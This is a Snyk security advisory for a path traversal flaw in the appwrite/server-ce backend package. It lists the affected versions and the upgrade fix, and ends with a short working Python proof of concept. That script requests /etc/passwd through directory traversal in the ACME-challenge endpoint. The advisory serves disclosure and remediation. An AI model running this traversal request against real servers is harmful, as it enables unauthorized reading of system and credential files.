Path Traversal Affecting appwrite/server-ce package, versions >=0.5.0, <0.12.2
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-APPWRITESERVERCE-6276958
- published 26 Feb 2024
- disclosed 23 Feb 2024
- credit @dubs3c
Introduced: 23 Feb 2024
CVE-2022-25377 Open this link in a new tabHow to fix?
Upgrade appwrite/server-ce to version 0.12.2 or higher.
Overview
appwrite/server-ce is an End to end backend server for frontend and mobile apps.
Affected versions of this package are vulnerable to Path Traversal due to the ACME-challenge endpoint. An attacker can read arbitrary local files by utilizing directory traversal sequences.
Notes:
This is only exploitable if
APP_STORAGE_CERTIFICATES/.well-known/acme-challengeexists on disk, which occurs automatically if the user opts to install Let's Encrypt certificates via the application.If
phpis running as root as it is in provided docker environment, the LFI allows for reading any file on the system.
PoC
import urllib.request
### Appwrite Unauthenticated LFI
# Vulnerable versions: 0.5.0 <= 0.12.1
# Date: 2021-12-08
# Author: @dubs3c
# dubell.io
#
# $APP_STORAGE_CERTIFICATES/.well-known/acme-challenge must exist on target's disk
try:
r = urllib.request.urlopen('http://localhost:8080/.well-known/acme-challenge/../../../../../../../../etc/passwd')
print(r.read().decode())
except urllib.error.HTTPError as e:
print(f"[-] Status code {e.status}. Exploit not possible...")